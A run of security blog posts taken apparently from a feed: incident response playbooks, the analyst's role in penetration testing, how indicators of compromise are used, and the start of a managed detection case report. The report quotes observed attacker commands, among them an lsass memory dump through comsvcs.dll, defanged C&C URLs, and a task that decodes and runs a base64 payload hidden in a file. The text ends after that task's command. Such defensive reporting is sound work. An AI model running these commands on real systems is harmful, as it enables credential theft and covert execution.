Once the incident scope is extended, the analyst can enrich assets and artifacts using the data from Threat Intelligence resources or a local system featuring inventory information, such as Active Directory, IDM, or CMDB. Based on the information on the affected assets, the response team can measure the risk to make the right choice of further actions. Everything depends of how many hosts, users, systems, business processes, or customers have been affected, and there are several ways to escalate the incident. For a medium risk, only the SOC manager and certain administrators must be notified to contain the incident and resolve the issue. In a critical risk case, however, the crisis team, HR department, or the regulatory authority must be notified by the response team.

The last component of the analysis phase is notification, meaning that every stakeholder must be notified of the incident in timely manner, so the system owner can step in with effective containment and recovery measures.

Detection and Analysis phase actions to analyze the incident

Detection and Analysis phase actions to analyze the incident

3. Containment is one of the most important phases to minimize incident consequences

The following big part consists of Containment, Eradication and Recovery phases. The main goal of containment is to keep the situation under control after an incident has occurred. Based on incident severity and possible damage caused, the response team should know the proper set of containment measures.

Following the prestage where workflows had been defined, we now have a list of different object types and possible actions that can be completed using our tool stack. So, with a list of actions in hand, we just want to choose proper measures based on impact. This stage mostly defines the final damage: the smoother and more precise the actions the playbook suggests for this phase, the prompter will be our response to block the destructive activity and minimize the consequences. During the containment process, the analyst performs a number of different actions: deletes malicious files, prevents their execution, performs network host isolation, disables accounts, scans disks with the help of security software, and more.

The eradication and recovery phases are similar and consist of procedures meant to put the system back into operation. The eradication procedures include cleaning up all traces of the attack—such as malicious files, created scheduled tasks and services—and depend on what traces were left following the intrusion. During the recovery process, the response team should simply adopt a ‘business as usual’ stance. Just as the eradication, the recovery phase is optional, because not every incident impacts the infrastructure. Within this phase we perform certain health check procedures and revoke changes that had been made during the attack.

Incident containment steps and recovery measures

Incident containment steps and recovery measures

4. Lessons learned, or required post-incident actions

The last playbook phase is Post-incident activity, or Lesson learning. The phase is focused on how to improve the process. To simplify this task, we can define a set of questions to be answered by the incident response team. For example:

  • How well did the incident response team manage the incident?
  • What information was the first to be required?
  • Could the team have done a better job sharing the information with other organizations/departments?
  • What could the team do differently next time if the same incident occurred?
  • What additional tools or resources are needed to help prevent or mitigate similar incidents?
  • Were there any wrong actions that had caused damage or inhibited recovery?

Answering these questions will enable the response team to update the knowledge base, improve the detection and prevention mechanism, and adjust the next response plan.

Summary: components of a good playbook

To develop a cybersecurity incident response playbook, we need to figure out the incident management process with focus on phases. As we go deeper into the details, we look for tools/systems to help us with the detection, investigation, containment, eradication, and recovery phases. Once we know our set of tools, we can define the actions that can be performed:

  • logging;
  • enriching the inventory information or telemetry of affected assets or reputation of external resources;
  • incident containment through host isolation, preventing malicious file execution, URL blocking, termination of active sessions, or disabling of accounts;
  • cleaning up the traces of intrusion by deleting remote files, deleting suspicious services, or scheduled tasks;
  • recovering the system’s operational state by revoking changes;
  • formalizing lessons learned by creating a new article in the local knowledge base for later reference.

Additionally, we want to define responsibilities within the response team, for each team member must know what his or her mission-critical role is. Once the preparation is done, we can begin developing the procedures that will form the playbook. As a common rule, every procedure or playbook building block looks like “<a subject> does <an action> on <an object> using <a tool>”—and now that all subjects, actions, objects, and tools have been defined, it is pretty easy to combine them to create procedures and design the playbook. And of course, keep in mind and stick to your response plan and its phases.

]]>
https://securelist.com/developing-an-incident-response-playbook/109145/feed/ 0 full large medium thumbnail
Good, Perfect, Best: how the analyst can enhance penetration testing results https://securelist.com/how-the-analyst-can-enhance-pentest/108652/ https://securelist.com/how-the-analyst-can-enhance-pentest/108652/#respond Fri, 10 Feb 2023 10:00:33 +0000 https://kasperskycontenthub.com/securelist/?p=108652

Penetration testing is something that many (of those who know what a pentest is) see as a search for weak spots and well-known vulnerabilities in clients’ infrastructure, and a bunch of copied-and-pasted recommendations on how to deal with the security holes thus discovered. In truth, it is not so simple, especially if you want a reliable test and useful results. While pentesters search for vulnerabilities and put a lot of effort into finding and demonstrating possible attack vectors, there is one more team member whose role remains unclear: the cybersecurity analyst. This professional takes a helicopter view of the target system to properly assess existing security holes and to offer the client a comprehensive picture of the penetration testing results combined with an action plan on how to mitigate the risks. In addition to that, the cybersecurity analyst formulates a plan in the business language that helps the management team, including the C-level, to understand what they are about to spend money on.

Drawing on Kaspersky’s expertise with dozens of security assessment projects, we want to reveal the details of the analyst’s role on these projects: who they are, what they do, why projects carried out together by pentesters and an analyst are much more useful for clients.

Who is an analyst?

In general, an analyst is a professional who works on datasets. For example, we all know about financial analysts who evaluate the efficiency of financial management. There are more than one type of analyst in the field of information security:

  • Security Operation Center analysts work on incident response and develop detection signatures in a timely fashion;
  • Malware analysts examine malware samples;
  • Cyberthreat intelligence analysts study the behavior of various attackers, diving deeper into their tactics and techniques.

Speaking of the analyst on a security assessment project, their role is to link together the pentester, the manager, and the client. At Kaspersky for example, an analyst contributes to nearly all security assessment projects, such as penetration testing, application security assessment, red teaming, and other. The goals and target scope of these projects can be different: from searching for vulnerabilities in an online banking application to identifying attack vectors against ICS systems and critical infrastructure assets. Team composition can change, so the analyst works with experts from many areas, enriching the project and sharing the expertise with the client.

The analyst’s role in the security assessment process

It is possible to distinguish the following stages of analyst work in the security assessment process:

  • Advanced reconnaissance,
  • Interpreting network scan results,
  • Threat identification,
  • Verification of threat modeling,
  • Visualization,
  • Vulnerability prioritization,
  • Recommendations,
  • Project follow-up.

Next, we will go over each of these steps in detail.

Advanced reconnaissance

The analyst begins by gathering information about the organization before the security testing conducted by pentesters can begin. The analyst studies public resources to learn about the business systems and external resources, and collects technical information about the target systems: whether the software was custom-built, provided by a vendor, or created from an open-source codebase, what programming language was used, and so on. They also look up known data leaks that may link to client employees and compromised corporate credentials. Often, this data is offered for sale on the dark web, and the analyst’s job is to detect these mentions and warn the client. All this information is collected to discover potential attack vectors and negotiate a project scope with the client. Potential attack vectors will then be explored by pentesters. For example, publicly available employee data can be used for social engineering attacks or to gain access to company resources, and information about the software can be used to find known vulnerabilities.

Project case: The benefits of OSINT

Here is an example from one of our security assessment projects where information-gathering by the analyst helped to identify a new attack vector. The analyst successfully used the Kaspersky Digital Footprint Intelligence service to find compromised employee credentials on the dark web. With the client’s approval, a pentester attempted to authenticate with one of the company’s external services using these credentials and finding that they were valid. Seeing how the client’s network perimeter was highly secured and all public-facing services, properly protected with authentication, the case clearly demonstrated that even a well-hardened infrastructure could be vulnerable to OSINT and threat intelligence.

A diagram of the penetration testing project where the information gathering by the analyst helped to identify a new attack vector

A diagram of the penetration testing project where the information gathering by the analyst helped to identify a new attack vector

Interpreting scan results

At this stage, we have agreed with the client on a project scope, and pentesters are running an instrumental network scan to identify the client’s public-facing services and open ports. In our experience, the state of network perimeter cybersecurity in most organizations is far from perfect, but due to project constraints, pentesters typically target only a small number of perimeter security flaws. The analyst examines the network scan outputs and highlights the key issues. Their goal is to gather detailed information about insufficient network traffic filtering, use of insecure network protocols, exposure of remote management and DBMS access interfaces, and other possible vulnerabilities. Otherwise, the client will not see the full picture.

Threat identification

Information about all attack vectors that were successfully exploited during the test comes from the pentester, whereas the analyst transforms these to build a detailed report describing the vulnerabilities and security flaws. In the hands of the analyst, a description of each attack vector, enriched with evidence, screenshots and collected data, turns into detailed answers to the following questions:

  • What vulnerabilities were found and how?
  • What are the conditions for exploitation?
  • Which component is vulnerable (IP address, port, script, parameter)?
  • What exploit/utility was used?
  • What was the result (data / access level / conditions for exploiting another vulnerability)?

Notably, multiple vulnerabilities pieced together may result in a single attack vector leading from zero-level access to the highest privileges.

Verification of threat modeling

After the previous stages are complete, the vulnerabilities should be grouped under categories. Below are a few examples:

  • Web application vulnerabilities (SQL injection, XSS, CSRF);
  • Access control misconfigurations (for example, excessive account privileges, use of the same local account on different hosts);
  • Patch management issues (use of software that has known vulnerabilities).

Next, all vulnerabilities and security misconfigurations will be converted into threats that can exploit these. Armed with the knowledge of the client’s business systems, the analyst can assess to which critical resources a cybercriminal will gain access in the event of an attack. Will the attacker be able to reach the client’s data, gain access to employees’ personal data, or maybe to payment orders? For example, by gaining total control over the client’s internal infrastructure, including critical IT systems, an attacker can disrupt the organization’s business processes, while the ability to read arbitrary files on the client’s servers can lead to sensitive documents being stolen.

Visualization

The analyst creates a diagram to visualize all of the pentester’s activities relating to the successful attack scenarios. This is an important time not just for the client, who clearly sees everything that happened (what vulnerabilities were exploited, which hosts were accessed, and what threats this led to), but also for the pentesters. This is because, looking at this level of detail, they can see vectors that previously went unnoticed, findings that the report missed, and attacks that can be launched in the future.

Project case: discovering an additional attack vector

During an internal penetration test, our experts found multiple vulnerabilities and obtained administrative privileges in the domain. However, while analyzing the output of the BloodHound tool, the analyst uncovered hidden relationships, stumbling on an attack path within an Active Directory environment. The analyst found that external contractors could escalate their privileges in the system due to Active Directory being misconfigured. Constrained by the project scope, the pentesters did not go on to gain access to contractor credentials, so they were not able to exploit said misconfiguration. The client greatly appreciated the discovery of the new attack vector.

A project case where BloodHound tool output analysis revealed an additional attack vector

Vulnerability prioritization

When all vulnerabilities and threats have been identified, an analyst moves on to the prioritization stage. At this step, it should be decided which vulnerabilities need fixing first. The simplest solution would be to prioritize those with the highest severity level, but it is not the correct one. There are situations where a “critical” vulnerability identified in a test web application does not cause the same amount of damage as a “medium” vulnerability in a critical system. An example is a vulnerability in an online bank whose exploitation can trigger a whole chain of interconnected vulnerabilities, which would allow the attacker to steal the clients’ money.

So, the analyst looks at the overall business impact of the attack vector and the risk level of the vulnerabilities involved. Next, they prioritize the vulnerabilities, starting with the ones that pose the most severe threats but are easiest and fastest to fix, and following with those which require major changes to the business processes and are a subject of strategic cybersecurity improvements. After that, the analyst arranges the list of vulnerabilities and recommendations in the order in which measures should be taken.

Vulnerabilities prioritization scheme

Vulnerabilities prioritization scheme

Recommendations

The analyst prepares recommendations, which are part of project deliverables and should consider the following:

  • A timeframe for implementation:
    • Short term (<1 month): easily implemented recommendations, such as installing security updates or changing compromised credentials;
    • Medium term (<1 year): the most important changes requiring significant effort such as, for example, enforcing strict network filtering rules, restricting access to network services and applications, or revising user privileges and revoking excessive ones;
    • Long term (>1 year): changing the architecture and business processes, implementing/improving security processes and controls, such as, for example, developing a robust procedure for periodical updates.
  • The client’s approach to certain systems and business processes;
  • Industry best practices and cybersecurity frameworks.

Project follow-up

At the final stage, the analyst provides three levels of project deliverables:

  • An executive overview for C-level managers and decision-makers who represent the client.
  • Technical details of the security assessment for the client’s IS team, SOC officers, IT specialists, and other employees.
  • Machine-readable results that can be processed automatically or used in the client’s cybersecurity products.

Three levels of project deliverables

Three levels of project deliverables

Conclusions

In summary of the above, the main advantages of having an analyst on a security assessment project, as evidenced by our experience, are as follows:

  • The ability to collect and analyze a large amount of data, whether found in external sources or received from pentesters;
  • Pentester time savings: these team members may not be concerned with the final results or reports as such;
  • Collaboration with the client’s SOC or blue team to check whether the attacks were noticed, and to capture the defenders’ actions and the timing of the attacks;
  • Visualization of the test results and translation of these into the business language.

Last but not least, the analyst provides a detailed mitigation plan including short-term and long-term recommendations, and actions required for mitigating the discovered threats. As part of our security assessment services, we give clients an overview of cybersecurity risks specific to their organizations (industry, infrastructure, and goals), and advice on hardening security and mitigating future threats.

]]>
https://securelist.com/how-the-analyst-can-enhance-pentest/108652/feed/ 0 full large medium thumbnail
Indicators of compromise (IOCs): how we collect and use them https://securelist.com/how-to-collect-and-use-indicators-of-compromise/108184/ https://securelist.com/how-to-collect-and-use-indicators-of-compromise/108184/#comments Fri, 02 Dec 2022 08:00:07 +0000 https://kasperskycontenthub.com/securelist/?p=108184

It would hardly be an exaggeration to say that the phrase “indicators of compromise” (or IOCs) can be found in every report published on the Securelist. Usually after the phrase there are MD5 hashes[1], IP addresses and other technical data that should help information security specialists to counter a specific threat. But how exactly can indicators of compromise help them in their everyday work? To find the answer we asked three Kaspersky experts: Pierre Delcher, Senior Security Researcher in GReAT, Roman Nazarov, Head of SOC Consulting Services, and Konstantin Sapronov, Head of Global Emergency Response Team, to share their experience.

What is cyber threat intelligence, and how do we use it in GReAT?

We at GReAT are focused on identifying, analyzing and describing upcoming or ongoing, preferably unknown cyberthreats, to provide our customers with detailed reports, technical data feeds, and products. This is what we call cyber threat intelligence. It is a highly demanding activity, which requires time, multidisciplinary skills, efficient technology, innovation and dedication. It also requires a large and representative set of knowledge about cyberattacks, threat actors and associated tools over an extended timeframe. We have been doing so since 2008, benefiting from Kaspersky’s decades of cyberthreat data management, and unrivaled technologies. But why are we offering cyber threat intelligence at all?

The intelligence we provide on cyberthreats is composed of contextual information (such as targeted organization types, threat actor techniques, tactics and procedures – or TTPs – and attribution hints), detailed analysis of malicious tools that are exploited, as well as indicators of compromise and detection techniques. This in effect offers knowledge, enables anticipation, and supports three main global goals in an ever-growing threats landscape:

  • Strategic level: helping organizations decide how many of their resources they should invest in cybersecurity. This is made possible by the contextual information we provide, which in turn makes it possible to anticipate how likely an organization is to be targeted, and what the capabilities are of the adversaries.
  • Operational level: helping organizations decide where to focus their existing cybersecurity efforts and capabilities. No organization in the world can claim to have limitless cybersecurity resources and be able to prevent or stop every kind of threat! Detailed knowledge on threat actors and their tactics makes it possible for a given sector of activity to focus prevention, protection, detection and response capabilities on what is currently being (or will be) targeted.
  • Tactical level: helping organizations decide how relevant threats should be technically detected, sorted, and hunted for, so they can be prevented or stopped in a timely fashion. This is made possible by the descriptions of standardized attack techniques and the detailed indicators of compromise we provide, which are strongly backed by our own widely recognized analysis capabilities.

What are indicators of compromise?

To keep it practical, indicators of compromise (IOCs) are technical data that can be used to reliably identify malicious activities or tools, such as malicious infrastructure (hostnames, domain names, IP addresses), communications (URLs, network communications patterns, etc.) or implants (hashes that designate files, files paths, Windows registry keys, artifacts that are written in memory by malicious processes, etc.). While most of them will in practice be file hashes – designating samples of malicious implants – and domain names – identifying malicious infrastructure, such as command and control (C&C) servers – their nature, format and representation are not limited. Some IOC sharing standards exist, such as STIX.

As mentioned before, IOCs are one result of cyber threat intelligence activities. They are useful at operational and tactical levels to identify malicious items and help associate them with known threats. IOCs are provided to customers in intelligence reports and in technical data feeds (which can be consumed by automatic systems), as well as further integrated in Kaspersky products or services (such as sandbox analysis products, Kaspersky Security Network, endpoint and network detection products, and the Open Threat Intelligence Portal to some extent).

How does GReAT identify IOCs?

As part of the threat-hunting process, which is one facet of cyber threat intelligence activity (see the picture below), GReAT aims at gathering as many IOCs as possible about a given threat or threat actor, so that customers can in turn reliably identify or hunt for them, while benefiting from maximum flexibility, depending on their capabilities and tools. But how are those IOCs identified and gathered? The rule of thumb on threat hunting and malicious artifacts collection is that there is no such thing as a fixed magic recipe: several sources, techniques and practices will be combined, on a case-by-case basis. The more comprehensively those distinct sources are researched, the more thoroughly analysis practices are executed, and the more IOCs will be gathered. Those research activities and practices can only be efficiently orchestrated by knowledgeable analysts, who are backed by extensive data sources and solid technologies.

General overview of GReAT cyber threat intelligence activities

General overview of GReAT cyber threat intelligence activities

GReAT analysts will leverage the following sources of collection and analysis practices to gather intelligence, including IOCs – while these are the most common, actual practices vary and are only limited by creativity or practical availability:

  • In-house technical data: this includes various detection statistics (often designated as “telemetry”[2]), proprietary files, logs and data collections that have been built across time, as well as the custom systems and tools that make it possible to query them. This is the most precious source of intelligence as it provides unique and reliable data from trusted systems and technologies. By searching for any previously known IOC (e.g., a file hash or an IP address) in such proprietary data, analysts can find associated malicious tactics, behaviors, files and details of communications that directly lead to additional IOCs, or will produce them through analysis. Kaspersky’s private Threat Intelligence Portal (TIP), which is available to customers as a service, offers limited access to such in-house technical data.
  • Open and commercially available data: this includes various services, file data collections that are publicly available, or sold by third parties, such as online file scanning services (e.g., VirusTotal), network system search engines (e.g., Onyphe), passive DNS databases, public sandbox reports, etc. Analysts can search those sources the same way as proprietary data. While some of these data are conveniently available to anyone, information about the collection or execution context, the primary source of information, or data processing details are often not provided. As a result, such sources cannot be trusted by GReAT analysts as much as in-house technical data.
  • Cooperation: by sharing intelligence and developing relationships with trusted partners such as peers, digital service providers, computer security incident response teams (CSIRTs), non-profit organizations, governmental cybersecurity agencies, or even some Kaspersky customers, GReAT analysts can sometimes acquire additional knowledge in return. This vital part of cyber threat intelligence activity enables a global response to cyberthreats, broader knowledge of threat actors, and additional research that would not otherwise be possible.
  • Analysis: this includes automated and human-driven activities that consist of thoroughly dissecting gathered malicious artifacts, such as malicious implants, or memory snapshots, in order to extract additional intelligence from them. Such activities include reverse-engineering or live malicious implant execution in controlled environments. By doing so, analysts will often be able to discover concealed (obfuscated, encrypted) indicators, such as command and control infrastructure for malware, unique development practices from malware authors, or additional malicious tools that are delivered by a threat actor as an additional stage of an attack.
  • Active research: this includes specific threat research operations, tools, or systems (sometimes called “robots”) that are built by analysts with the specific intent to continuously look for live malicious activities, using generic and heuristic approaches. Those operations, tools or systems include, but are not limited to, honeypots[3], sinkholing[4], internet scanning and some specific behavioral detection methods from endpoint and network detection products.

How does GReAT consume IOCs?

Sure, GReAT provides IOCs to customers, or even to the public, as part of its cyber threat intelligence activities. However, before providing them, the IOCs are also a cornerstone of the intelligence collection practices described here. IOCs enable GReAT analysts to pivot from an analyzed malicious implant to additional file detection, from a search in one intelligence source to another. IOCs are thus the common technical interface to all research processes. As an example, one of our active research heuristics might identify previously unknown malware being tentatively executed on a customer system. Looking for the file hash in our telemetry might help identify additional execution attempts, as well as malicious tools that were leveraged by a threat actor, just before the first execution attempt. Reverse engineering of the identified malicious tools might in turn produce additional network IOCs, such as malicious communication patterns or command and control server IP addresses. Looking for the latter in our telemetry will help identify additional files, which in turn will enable further file hash research. IOCs enable a continuous research cycle to spin, but it only begins at GReAT; by providing IOCs as part of an intelligence service, GReAT expects the cycle to keep spinning at the customer’s side.

Apart from their direct use as research tokens, IOCs are also carefully categorized, attached to malicious campaigns or threat actors, and utilized by GReAT when leveraging internal tools. This IOC management process allows for two major and closely related follow-up activities:

  • Threat tracking: by associating known IOCs (as well as advanced detection signatures and techniques) to malicious campaigns or threat actors, GReAT analysts can automatically monitor and sort detected malicious activities. This simplifies any subsequent threat hunting or investigation, by providing a research baseline of existing associated IOCs for most new detections.
  • Threat attribution: by comparing newly found or extracted IOCs to utilized IOCs, GReAT analysts can quickly establish links from unknown activities to define malicious campaigns or threat actors. While a common IOC between a known campaign and newly detected activity is never enough to draw any attribution conclusion, it’s always a helpful lead to follow.

IOC usage scenarios in SOCs

From our perspective, every security operation center (SOC) uses known indicators of compromise in its operations, one way or another. But before we talk about IOC usage scenarios, let’s go with the simple idea that an IOC is a sign of a known attack.

At Kaspersky, we advise and design SOC operations for different industries and in different formats, but IOC usage and management are always part of the SOC framework we suggest our customers implement. Let’s highlight some usage scenarios of IOCs in an SOC.

Prevention

In general, today’s SOC best practices tell us to defend against attacks by blocking potential threats at the earliest possible stage. If we know the exact indicators of an attack, then we can block it, and it is better to do so on multiple levels (both network and endpoint) of our protected environment. In other words, the concept of defense in depth. Blocking any attempts to connect to a malicious IP, resolve a C2 FQDN, or run malware with a known hash should prevent an attack, or at least not give the attacker an easy target. It also saves time for SOC analysts and reduces the noise of SOC false positive alerts. Unfortunately, an excellent level of IOC confidence is vital for the prevention usage scenario; otherwise, a huge number of false positive blocking rules will affect the business functions of the protected environment.

Detection

The most popular scenario for IOC usage in an SOC – the automatic matching of our infrastructure telemetry with a huge collection of all possible IOCs. And the most common place to do it is SIEM. This scenario is popular for a number of reasons:

  • SIEM records multiple types of logs, meaning we can match the same IOC with multiple log types, e.g., domain name with DNS requests, those received from corporate DNS servers, and requested URLs obtained from the proxy.
  • Matching in SIEM helps us to provide extended context for analyzed events: in the alert’s additional information an analyst can see why the IOC-based alert was triggered, the type of threat, confidence level, etc.
  • Having all the data on one platform can reduce the workload for the SOC team to maintain infrastructure and prevent the need to organize additional event routing, as described in the following case.

Another popular solution for matching is the Threat Intelligence Platform (TIP). It usually supports better matching scenarios (such as the usage of wildcards) and assumes reducing some of the performance impact generated by correlation in SIEM. Another huge advantage of TIP is that this type of solution was initially designed to work with IOCs, to support their data schema and manage them, with more flexibility and features to set up detection logic based on an IOC.

When it comes to detection we usually have a lower requirement for IOC confidence because, although unwanted, false positives during detection are a common occurrence.

Investigation

Another routine where we work with IOCs is in the investigation phase of any incident. In this case, we are usually limited to a specific subset of IOCs – those that were revealed within the particular incident. These IOCs are needed to identify additional affected targets in our environment to define the real scope of the incident. Basically, the SOC team has a loop of IOC re-usage:

  1. Identify incident-related IOC
  2. Search for IOC on additional hosts
  3. Identify additional IOC on revealed targets, repeat step 2.

Containment, Eradication and Recovery

The next steps of incident handling also apply IOCs. In these stages the SOC team focuses on IOCs obtained from the incident, and uses them in the following way:

  • Containment – limit attacker abilities to act by blocking identified IOCs
  • Eradication and Recovery – control the lack of IOC-related behavior to verify that the eradication and recovery phases were completed successfully and the attacker’s presence in the environment was fully eliminated.

Threat Hunting

By threat hunting we imply activity aimed at revealing threats, namely those that have bypassed SOC prevention and detection capabilities. Or, in other words, Assume Breach Paradigm, which intends that despite all the prevention and detection capabilities, it’s possible that we have missed a successful attack and have to analyze our infrastructure as though it is compromised and find traces of the breach.

This brings us to IOC-based threat hunting. The SOC team analyzes information related to the attack and evaluates if the threat is applicable to the protected environment. If yes, the hunter tries to find an IOC in past events (such as DNS queries, IP connection attempts, and processes execution), or in the infrastructure itself – the presence of a specific file in the system, a specific value of registry key, etc. The typical solutions supporting the SOC team with such activity are SIEM, EDR and TIP. For this type of scenario, the most suitable IOCs are those extracted from APT reports, or received by your TI peers.

In IOC usage scenarios we have touched on different types of IOCs multiple times. Let’s summarize this information by breaking down IOC types according to their origin:

  • Provider feeds – subscription for IOC provided by security vendors in the form of a feed. Usually contains a huge number of IOCs observed in different attacks. The level of confidence varies from vendor to vendor, and the SOC team should consider vendor specialization and geo profile to utilize actual IOCs. Usage feeds for prevention and threat hunting are questionable due to the potentially high level of false positives.
  • Incident IOCs – IOC generated by the SOC team during analysis of security incidents. Usually, the most trusted type of IOC.
  • Threat intelligence IOCs – a huge family of IOCs generated by the TI team. The quality depends directly on the level of expertise of your TI Analysts. The usage of TI IOCs for prevention depends heavily on the TI data quality and can trigger too many false positives, and therefore impact business operation.
  • Peer IOCs – IOCs provided by peer organizations, government entities, and professional communities. Can usually be considered as a subset of TI IOCs or incident IOCs, depending on the nature of your peers.

If we summarize the reviewed scenarios, IOC origin, and their applicability, then map this information to NIST Incident Handling stages[5], we can create the following table.

IOC scenario usage in SOC

All these scenarios have different requirements for the quality of IOCs. Usually, in our SOC we don’t have too many issues with Incident IOCs, but for the rest we must track quality and manage it in some way. For better quality management, the provided metrics should be aggregated for every IOC origin to evaluate IOC source, not the dedicated IOCs. Some basic metrics, identified by our SOC Consultancy team, that can be implemented to measure IOC quality are:

  • Conversion to incident – which proportion of IOCs has triggered a real incident. Applied for detection scenarios
  • FP rate – false positive rate generated by IOC. Works for detection and prevention
  • Uniqueness – applied for IOC source and tells the SOC team how unique the set of provided IOCs is compared to other providers
  • Aging – whether an IOC source provides up-to-date IOCs or not
  • Amount – number of provided IOCs by source
  • Context information – usability and fullness of context provided with IOCs

To collect these metrics, the SOC team should carefully track every IOC origin, usage scenario and the result of use.

How does the GERT team use IOCs in its work?

In GERT we specialize in the investigation of incidents and the main sources of information in our work are digital artifacts. By analyzing them, experts discover data that identifies activity directly related to the incident under investigation. Thus, the indicators of compromise allow experts to establish a link between the investigated object and the incident.

Throughout the entire cycle of responding to information security incidents, we use different IOCs at different stages. As a rule, when an incident occurs and a victim is contacted, we receive indicators of compromise that can serve to confirm the incident, attribute the incident to an attacker and make decisions on the initial response steps. For example, if we consider one of the most common incidents involving ransomware, then the initial artifact is the files. The IOC indicators in this case will be the file names or their extensions, as well as the hash of the sum of the files. Such initial indicators make it possible to determine the type of cryptographer, to point to a group of attackers and their characteristic techniques, tactics and procedures. They also make it possible to define recommendations for an initial response.

The next set of IOCs that we can get are indicators from the data collected by triage. As a rule, these indicators show the attackers’ progress through the network and allow additional systems involved in the incident to be identified. Mostly, these are the names of compromised users, hash sums of malicious files, IP addresses and URL links. Here it is necessary to note the difficulties that arise. Attackers often use legitimate software that is already installed on the targeted systems (LOLBins). In this case, it is more difficult to distinguish malicious launches of such software from legitimate launches. For example, the mere fact that the PowerShell interpreter is running cannot be considered without context and payload. In such cases it is necessary to use other indicators such as timestamps, user name, correlation of events.

Ultimately, all identified IOCs are used to identify compromised network resources and to block the actions of attackers. In addition, attack indicators are built on the basis of compromise indicators, which are used for preventive detection of attackers. In the final stage of the response, the indicators that are found are used to verify there are no more traces of the attackers’ presence in the network.

The result of each completed case with an investigation is a report that collects all the indicators of compromise and indicators of attack based on them. Monitoring teams should add these indicators to their monitoring systems and use them to proactively detect threats.

 
[1] A “hash” is a relatively short, fixed-length, sufficiently unique and non-reversible representation of arbitrary data, which is the result of a “hashing algorithm” (a mathematical function, such as MD5 or SHA-256). Contents of two identical files that are processed by the same algorithm result in the same hash. However, processing two files which only differ slightly will result in two completely different hashes. As a hash is a short representation, it is more convenient to designate (or look for) a given file using its hash than using its whole content.
[2] Telemetry designates the detection statistics and malicious files that are sent from detection products to the Kaspersky Security Network when customers agree to participate.
[3] Vulnerable, weak, and/or attractive systems that are deliberately exposed to Internet and continuously monitored in a controlled fashion, with the expectation that they will be attacked by threat actors. When such happens, monitoring practices enable detecting new threats, exploitation methods or tools from attackers.
[4] Hijacking of known malicious command and control servers, with cooperation from Internet hosters or leveraging threat actors errors and infrastructure desertion, in order to neutralize their malicious behaviors, monitor malicious communications, as well as identify and notify targets.
[5] NIST. Computer Security Incident Handling Guide. Special Publication 800-61 Revision 2

]]>
https://securelist.com/how-to-collect-and-use-indicators-of-compromise/108184/feed/ 4 full large medium thumbnail
Server-side attacks, C&C in public clouds and other MDR cases we observed https://securelist.com/server-side-attacks-cc-in-public-clouds-mdr-cases/107826/ https://securelist.com/server-side-attacks-cc-in-public-clouds-mdr-cases/107826/#respond Wed, 02 Nov 2022 08:00:22 +0000 https://kasperskycontenthub.com/securelist/?p=107826

Introduction

This report describes several interesting incidents observed by the Kaspersky Managed Detection and Response (MDR) team. The goal of the report is to inform our customers about techniques used by attackers. We hope that learning about the attacks that took place in the wild helps you to stay up to date on the modern threat landscape and to be better prepared for attacks.

Command and control via the public cloud

The use of public cloud services like Amazon, Azure or Google can make an attacker’s server difficult to spot. Kaspersky has reported several incidents where attackers used cloud services for C&C.

Case #1: Cloudflare Workers as redirectors

Case description

The incident started with Kaspersky MDR detecting the use of a comprehensive toolset for security assessment, presumably Cobalt Strike, by an antimalware (AM) engine memory scan (MEM:Trojan.Win64.Cobalt.gen). The memory space belongs to the process c:\windows\system32\[legitimate binary name][1].exe.

While investigating, we found that the process had initiated network connections to a potential C&C server:

hXXps://blue-rice-1d8e.dropboxonline.workers[.]dev/jquery/secrets/[random sequence]
hXXps://blue-rice-1d8e.dropboxonline.workers[.]dev/mails/images/[cut out]?_udpqjnvf=[cut out]

The URL format indicates the use of Cloudflare Workers.

We then found that earlier, the binary had unsuccessfully[2] attempted to execute an lsass.exe memory dump via comsvcs.dll:

CMd.exE /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ^%B \Windows\Temp\[filename].doc full

Several minutes later, a suspicious .bat script was run. This created a suspicious WMI consumer, later classified by MDR as an additional persistence mechanism.

The incident was detected in a timely manner, so the attacker did not have the time to follow through. The attacker’s final goals are thus unknown.

Case detection

The table below lists the signs of suspicious activity that were the starting point for the investigation by the SOC.

MITRE ATT&CK Technique MDR telemetry event type used Detection details Description
T1588.002: Tool
  1. AM engine detection on beacon
AM verdict: MEM:Trojan.Win64.Cobalt.gen, which can be used for Cobalt Strike or Meterpreter A malicious payload was executed in the victim’s system and started communicating with the C&C server
T1620: Reflective Code Loading
  1. AM detection in memory
AM verdict: MEM:Trojan.Win64.Cobalt.gen The malicious payload migrated to the victim’s memory
  1. Process injection
Detection of code injection from an unknown binary into a system binary
T1071.001: Web Protocols
  1. HTTP connection
  2. Process start
Suspicious HTTP connections to the malicious URL: blue-rice-1d8e[.]dropboxonline.workers.dev/… from a non-browser process with a system integrity level The attacker’s communications with the C&C server
T1584.006: Web Services
  1. HTTP connection
URL reputation, regular expression in URL The attacker’s communications with the C&C server
T1102.001: Dead Drop Resolver
  1. HTTP connection
URL reputation, regular expression in URL The attacker’s communications with the C&C server
T1003.001: LSASS Memory
  1. AM detection on suspicious activity
AM detection on lsass memory access The attacker’s unsuccessful attempt to dump the lsass.exe memory to a file
  1. Process start
Regex on command like: rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <PID> lsass.dmp full
T1546.003: Windows Management Instrumentation Event Subscription
  1. Windows event
  2. WMI activity
WMI active script event consumer created remotely The attacker gained persistence through active WMI

Payload hidden in long text

Case #1: A scheduled task that loads content from a long text file

Case description

This case started with a suspicious scheduled task. The listing below should give you a general idea of the task and the command it executes.
Scheduled task:

Microsoft\Windows\Management\Provisioning\YLepG5JS\075C8620-1D71-4322-ACE4-45C018679FC9, HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A311AA10-BBF3-4CDE-A00B-AAAAB3136D6A}, C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\YLepG5JS\075C8620-1D71-4322-ACE4-45C018679FC9

Command:

"wscript.exe" /e:vbscript /b "C:\Windows\System32\r4RYLepG5\9B2278BC-F6CB-46D1-A73D-5B5D8AF9AC7C" "n; $sc = [System.Text.Encoding]::UTF8.GetString([System.IO.File]::ReadAllBytes('C:\Windows\System32\drivers\S2cZVnXzpZ\02F4F239-0922-49FE-A338-C7460CB37D95.sys'), 1874201, 422); $sc2 = [Convert]::FromBase64String($sc); $sc3 = [System.Text.Encoding]::UTF8.GetString($sc2); Invoke-Command ([Scriptblock]::Create($sc3))"

